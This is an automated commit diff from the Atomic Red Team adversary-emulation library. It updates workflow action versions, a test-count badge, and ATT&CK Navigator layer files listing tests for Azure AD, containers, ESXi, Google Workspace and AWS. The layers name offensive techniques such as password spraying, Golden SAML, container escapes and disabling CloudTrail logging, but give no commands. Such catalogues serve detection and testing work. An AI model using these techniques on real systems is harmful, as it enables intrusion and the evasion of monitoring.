Generated docs from job=generate-docs branch=master [ci skip]

Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>

.github/workflows/assign-labels.yml

@@ -11,7 +11,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: download-artifact
-        uses: actions/github-script@v8
+        uses: actions/github-script@v9
         with:
           script: |
             let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
@@ -35,7 +35,7 @@ jobs:
         run: unzip labels.zip
 
       - name: assign-labels-and-reviewers
-        uses: actions/github-script@v8
+        uses: actions/github-script@v9
         with:
           script: |
             let fs = require('fs');

.github/workflows/validate-atomics.yml

@@ -42,7 +42,7 @@ jobs:
         with:
           python-version: "3.11.2"
           cache: "poetry"
-      - uses: actions/github-script@v8
+      - uses: actions/github-script@v9
         id: get_pr_number
         with:
           script: |

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1773-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1790-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 
 Atomic Red Team™ is a library of tests mapped to the

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-esxi.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
+{"name":"Atomic Red Team (ESXi)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
+{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View 